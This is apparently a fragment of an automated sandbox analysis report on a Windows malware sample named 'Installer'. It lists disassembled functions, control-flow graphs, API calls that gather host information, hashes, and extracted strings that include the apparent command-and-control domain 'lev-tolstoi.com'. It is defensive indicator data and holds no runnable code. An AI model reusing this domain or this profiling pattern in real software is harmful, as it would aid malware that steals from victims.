                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 43$R=r$`
                                                                                                                                                                                                                                                    • API String ID: 0-2203821455
                                                                                                                                                                                                                                                    • Opcode ID: e0acb60d089736bb0bc83eef3c2f5b7921e34f4d2e47646672359cc6aa43a476
                                                                                                                                                                                                                                                    • Instruction ID: 43e4bfb613ce475d3ef6dd8407ebf538eeec7cf6cf239a2e9ee7b256e35944b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0acb60d089736bb0bc83eef3c2f5b7921e34f4d2e47646672359cc6aa43a476
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9230571D083908FDB10DF38C84579EBFF1AB56310F0982AAD499AB3D2D7788985CB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "=B$%! 0$%: !$4$H$de$lev-tolstoi.com$x}}s
                                                                                                                                                                                                                                                    • API String ID: 0-3503028355
                                                                                                                                                                                                                                                    • Opcode ID: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                                                                                                                                                                    • Instruction ID: 2d009fd93e7b9374216b3497db79d8202485ae03d753f23917b742f1bf9f436d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41821F75708311CFD324CF28E89176BB7E2EB8A311F59897CE59187391D738A906CB86

Control-flow Graph
(graph image for the function at 423d40; legend: Executed / Not Executed; the raw node and edge list is not reproduced here)
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423E29
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00423EAB
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 0M9O$5]=_$y{
• API String ID: 237503144-4183424673
• Opcode ID: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
• Instruction ID: 3637a5695bacef2f7ae8854d885bc1190330819d14954c5e0cbca8e40a0a3ce6
• Opcode Fuzzy Hash: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
• Instruction Fuzzy Hash: 0A02DAB46183409FE314DF65E88166FBBE1FBD1308F44892DE5C58B391EB788906CB56

Control-flow Graph
(graph image for the function at 4085f0; legend: Executed / Not Executed; the raw node and edge list is not reproduced here)
APIs
• GetCurrentProcessId.KERNEL32 ref: 00408614
• GetCurrentThreadId.KERNEL32 ref: 0040861E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408696
• GetForegroundWindow.USER32 ref: 00408761
  • Part of subcall function 0040B470: FreeLibrary.KERNEL32(004087D9), ref: 0040B476
  • Part of subcall function 0040B470: FreeLibrary.KERNEL32 ref: 0040B497
• ExitProcess.KERNEL32 ref: 004087F2
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 3676751680-0
• Opcode ID: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
• Instruction ID: e8cd0a5b1b6602d458645168f9022d0593551acc0d95c8fd4e55ee87bae5c504
• Opcode Fuzzy Hash: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
• Instruction Fuzzy Hash: 82418DB3B003004BD3186F798D15766B6C79BD5320F1E863EA895EB3DAEE789C054245

Control-flow Graph
(graph image for the function at 42c9d4; legend: Executed / Not Executed; the raw node and edge list is not reproduced here)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: OEpz$QFD3$rj
• API String ID: 0-3969983622
• Opcode ID: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
• Instruction ID: 76e3eab801afa7748f5422476167f4aa7a66d4a79f7629f79f88f53e2f4321bc
• Opcode Fuzzy Hash: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
• Instruction Fuzzy Hash: AEA1047060C3D18ED3298F2994A03BBBFE19FA7304F58586EE0C997392D7798905CB56

                                                                                                                                                                                                                                                    Control-flow Graph

• Basic blocks (node: address range, calls made): 1206 42cca2-42ccd8 (call 433150, call 407fe0); 1212 42cce0-42cd23; 1213 42cd25-42cd2c; 1214 42cd4b-42cd57; 1215 42cd2e-42cd32; 1217 42cd71-42cdc9 (call 440690, GetPhysicallyInstalledSystemMemory); 1218 42cd59-42cd5b; 1216 42cd40-42cd49; 1223 42cdd0-42cdf2; 1220 42cd60-42cd6d; 1222 42cd6f; 1224 42cdf4-42ce35 (call 41e540); 1227 42ce40-42ce5c; 1228 42ce5e-42ce65; 1229 42ce67-42ce6b; 1230 42ce7b-42ce83; 1231 42ce70-42ce79; 1232 42ce85-42ce86; 1233 42ce9b-42cea8; 1234 42ce90-42ce99; 1235 42ceaa-42ceb1; 1236 42cecb-42cf1a; 1237 42cec0-42cec9; 1238 42cf20-42cf34; 1239 42cf36-42cf3d; 1240 42cf5b-42cf68; 1241 42cf3f-42cf43; 1243 42cf6a-42cf71; 1244 42cf8b-42d03d; 1242 42cf50-42cf59; 1245 42cf80-42cf89
• Edges: 1206->1212, 1212->1212, 1212->1213, 1213->1214, 1213->1215, 1214->1217, 1214->1218, 1215->1216, 1216->1214, 1216->1216, 1217->1223, 1218->1220, 1220->1220, 1220->1222, 1222->1217, 1223->1223, 1223->1224, 1224->1227, 1227->1227, 1227->1228, 1228->1229, 1228->1230, 1229->1231, 1230->1232, 1230->1233, 1231->1230, 1231->1231, 1232->1234, 1233->1235, 1233->1236, 1234->1233, 1234->1234, 1235->1237, 1236->1238, 1237->1236, 1237->1237, 1238->1238, 1238->1239, 1239->1240, 1239->1241, 1240->1243, 1240->1244, 1241->1242, 1242->1240, 1242->1242, 1243->1245, 1245->1244, 1245->1245
APIs
• GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042CD9C
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: OEpz$QFD3$rj
• API String ID: 3960555810-3969983622
• Opcode ID: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
• Instruction ID: 843eda79264cd3607644ba2c6e9f51ffbc4283e049ce5635c5debb878d24e918
• Opcode Fuzzy Hash: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
• Instruction Fuzzy Hash: E591157060C3D18ED3298F2994A03EBBFE1AF97304F58486EE0C997392D7798905CB56

Control-flow Graph

• Basic blocks (node: address range, calls made): 1346 409370-40937e; 1347 409384-4093ef (call 405e80, call 407fd0); 1348 4097d7; 1354 4093f0-409436; 1350 4097d9-4097e5; 1355 409438-40945b (call 408d10); 1358 409460-409485; 1359 409487-4094a4 (call 408d10); 1362 4094b0-4094ce; 1363 4094d0-409505 (call 408d10); 1366 409510-40955f; 1367 409561-40956b; 1368 409570-4095a1; 1369 4095a3-4095c8 (call 408d10); 1372 4095d0-4095e4; 1373 4095e6-4096ae (call 408f90); 1376 4096b0-4096e3; 1377 4096e5-4096ed; 1378 409711-40971c; 1379 4096ef-4096f7; 1380 409741-40976f; 1381 40971e-409721; 1382 409700-40970f; 1384 409770-409798; 1383 409730-40973f; 1385 40979a-4097af (call 40bd10); 1387 4097b4-4097d5 (call 407fe0)
• Edges: 1346->1347, 1346->1348, 1347->1354, 1348->1350, 1354->1354, 1354->1355, 1355->1358, 1358->1358, 1358->1359, 1359->1362, 1362->1362, 1362->1363, 1363->1366, 1366->1366, 1366->1367, 1367->1368, 1368->1368, 1368->1369, 1369->1372, 1372->1372, 1372->1373, 1373->1376, 1376->1376, 1376->1377, 1377->1378, 1377->1379, 1378->1380, 1378->1381, 1379->1382, 1380->1384, 1381->1383, 1382->1378, 1382->1382, 1383->1380, 1383->1383, 1384->1384, 1384->1385, 1385->1387, 1387->1350
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: ,-$4EAC7AD5F775DFB71441EDD8E05CE3DA$T$g*V9
• API String ID: 0-1073015448
• Opcode ID: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
• Instruction ID: a0ce2b4ea5d82b238d504246632dfdecb4304a147a1c54da40f31a80d191d4bf
• Opcode Fuzzy Hash: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
• Instruction Fuzzy Hash: ADC135B16083408BD718CF35C891A6BBBE5EFC2304F14496DE5D29B392DB38D90ACB56

Control-flow Graph

• Basic blocks (node: address range, calls made): 1391 433b7a-433c5b (call 414690, GetSystemMetrics * 2); 1399 433c62-433cf6
• Edges: 1391->1399
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
• Instruction ID: 01f348f677623f89764fea340cc94f5095fd4e31d5590f1ad9612ee75e4100da
• Opcode Fuzzy Hash: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
• Instruction Fuzzy Hash: E05172B4D142089FCB40EFACD98569DBBF0BB88300F11852AE498E7310D774A984CF96
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: Uninitialize
• String ID: lev-tolstoi.com$x~
• API String ID: 3861434553-3419122072
• Opcode ID: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
• Instruction ID: 6343ddfc659097a6b1acf70417bf2a81d4440c70e9b0de2d3dfcc7ed75506984
• Opcode Fuzzy Hash: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
• Instruction Fuzzy Hash: 32B146B1A047808FD319CF2AC4E0663BFA2EF9730571981ADC8D65F79AC7399806CB55
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
• Instruction ID: 72290171dc64d7e4f27391859bf3f99b55d54925dc59b80e2ac98bdd845427b2
• Opcode Fuzzy Hash: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
• Instruction Fuzzy Hash: D472E575A04B408FD714DF38C5853AABBE2AF99314F088A3ED5EB87791D678E445CB02
APIs
• LdrInitializeThunk.NTDLL(00441BF8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
• Opcode ID: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                                                                                                                                                                    • Instruction ID: ac99ad69f4e146c84b4f67b549d234f9fa435a805a225365c348144745e62db1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51BEB4D112159BEB14CF54C8907BFB7B2FFA9315F04612DD4416B3A0EB785C0A8B98
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                                                                                                                                                                    • Instruction ID: 65ca1ec6d4672f8839795e63c8614bf8e8fa17c57707b6a32643269015e7e6e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A4158B49083109BEB10CF24D88072BB7E1FF99368F24852DEA88573A1E7389D44C7C6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                                                                                                                                                                    • Instruction ID: 9fac65509ee92f571f5b79e95c1ad94962471f478490a82abc777c74c6c74bd9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A31EEB18083049BD314DF98D8C066BBBF5EB99314F14892DE79987280E335A818CB9A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                                                                                                                                                                    • Instruction ID: c62094c7f2aec0b4591fe89b4ffec96fa28a786c068cd393fffb3f8dac1334b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D7127756082419BEB24DF28C890A3FB3E2EFD9750F19C42EE68587365E73498609786
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                                                                                                                                                                    • Instruction ID: 6b3e4b7f11ac291a21e261308eef6cd7443abca3de393b842f6f559da3e6bac2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8051CE263492116BD7018B25CC81A7BB7EAE7DE360F14952EE5C083342C2BCDC82D79E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                                                                                                                                                                    • Instruction ID: 006929160d69d297b0fade613808cb138237ee9c33cbc0bff183a40fe4272359
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f67c24f99cd3bc66bd5b873502f9be22687b740bcac6bb5ea83f9132e44f2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F024796093805BD348CF34DCE1A6BBBA6E792608F05653CE58293290CA21DC598A4D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1246 42c3ae-42c3b8 1247 42c3ba-42c3c1 1246->1247 1248 42c3db-42c42b FreeLibrary call 440690 1246->1248 1250 42c3d0-42c3d9 1247->1250 1254 42c430-42c45c 1248->1254 1250->1248 1250->1250 1254->1254 1255 42c45e-42c468 1254->1255 1256 42c46a-42c478 1255->1256 1257 42c48d 1255->1257 1258 42c480-42c489 1256->1258 1259 42c494-42c4cc GetComputerNameExA 1257->1259 1258->1258 1260 42c48b 1258->1260 1261 42c4cf 1259->1261 1260->1259 1261->1261
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042C3E5
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                    • String ID: -!B$tidc
                                                                                                                                                                                                                                                    • API String ID: 2904949787-476040656
                                                                                                                                                                                                                                                    • Opcode ID: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                                                                                                                                                                    • Instruction ID: 0cb94904c914ad7ae8bd8e1ac9fe588995fa1e3a88885b05c0f925f6698cc2a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E321F17420C3918AD7218F39D8507EBBBE6ABE6304F94885ED0C8C7292DA798506C716

Control-flow Graph (image not reproduced): blocks 42c3ac-42c4cf; FreeLibrary, call 440690, GetComputerNameExA
APIs
• FreeLibrary.KERNEL32(?), ref: 0042C3E5
• GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: -!B$tidc
• API String ID: 2904949787-476040656
• Opcode ID: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
• Instruction ID: 36f598f07a78be95229329e16d831615469c789e38aad443987067daf5129e6e
• Opcode Fuzzy Hash: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
• Instruction Fuzzy Hash: 331136756083908BD720CF35E8407ABBBE6ABD6304F84846ED0C8C7261DF398405C706

Control-flow Graph (image not reproduced): block 40c5b6-40c718; CoInitializeEx * 2
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040C5BA
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6FF
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: Initialize
• String ID: E)ov
• API String ID: 2538663250-3776031005
• Opcode ID: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
• Instruction ID: 7eb1427ce90a185cc1fa67b5dec7511066f0963e0e52bfde8587bb9a189e8e04
• Opcode Fuzzy Hash: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
• Instruction Fuzzy Hash: 6941C8B4C10B40AFD370EF39990B7137EB4AB06250F504B1DF9EA866D4E631A4198BD7

Control-flow Graph (image not reproduced): blocks 42c332-42c4cf; call 440690, GetComputerNameExA
APIs
• GetComputerNameExA.KERNEL32(00000006,-!B,00000100), ref: 0042C4AD
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ComputerName
• String ID: -!B$tidc
• API String ID: 3545744682-476040656
• Opcode ID: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
• Instruction ID: cb59f9437d4d6314ce5892b09104ceaf55f68d0d243f063b9a53ef71cd653c73
• Opcode Fuzzy Hash: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
• Instruction Fuzzy Hash: BA11037561C390CBD721CF35D8907EBB7E6ABDA304F94886EC0C8C7255EE7985068716
APIs
• GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042C594
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ComputerName
• String ID: /CWl$m
• API String ID: 3545744682-3646203745
• Opcode ID: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
• Instruction ID: 03530a0ce53fbf409c5d07d4627929f5f9734d687145533c51ec677908ed519b
• Opcode Fuzzy Hash: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
• Instruction Fuzzy Hash: 19119D3010C7E19ADB319B3894687FBBBE4AF97300F5809ADC0CDC7292D77894458B96
APIs
• GetComputerNameExA.KERNEL32(00000005,?,00000100), ref: 0042C594
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ComputerName
• String ID: /CWl$m
• API String ID: 3545744682-3646203745
• Opcode ID: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
• Instruction ID: e0895b3182d1dc6c25a11d8008f41e73b737397a8b3a12be8f13edf20661ff36
• Opcode Fuzzy Hash: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
• Instruction Fuzzy Hash: 1201807010C7E18BDB319B34A8687FBB7E4AB96310F28096DC0CDC7291D77494459B56
APIs
• GetForegroundWindow.USER32 ref: 0043ED37
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
